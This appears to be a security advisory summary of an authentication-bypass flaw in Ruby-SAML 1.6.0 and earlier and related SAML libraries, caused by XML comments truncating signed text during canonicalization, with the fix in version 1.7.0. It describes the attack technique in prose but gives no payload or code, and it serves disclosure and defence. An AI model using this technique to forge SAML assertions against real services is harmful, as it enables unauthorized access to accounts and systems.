Multiple SAML libraries may allow authentication bypass via incorrect XML canonicalization and DOM traversal

Root

Cause

The vulnerability arises from incorrect use of XML DOM traversal and canonicalization APIs in OneLogin Ruby-SAML versions 1.6.0 and earlier. Specifically, these APIs handle comments inside XML nodes inconsistently, causing the library to lose inner text after a comment before cryptographically signing the SAML message. As a result, the signature covers only part of the content, enabling an attacker to insert arbitrary data after a comment without invalidating the signature [1] [3].

Exploitation

An attacker can exploit this by crafting a SAML assertion that contains a comment before malicious modifications. Since the signature is computed on the truncated text, any subsequent changes after the comment remain undetected. The attack does not require authentication and can be performed remotely by intercepting or manipulating SAML messages [2] [3].

Impact

Successful exploitation allows an unauthenticated remote attacker to modify the SAML assertion content (e.g., change the user identifier or attributes) and potentially bypass authentication to SAML service providers. This can lead to unauthorized access to applications and systems relying on the affected Ruby-SAML library [1] [3].

Mitigation

The issue is fixed in Ruby-SAML version 1.7.0 and later. Organizations using affected versions should update immediately. The same class of vulnerability also affects other SAML libraries (python-saml, saml2-js, OmniAuth-SAML, Shibboleth openSAML, and Wizkunde SAMLBase) [3]. No workaround is available; applying the patch is the only remediation.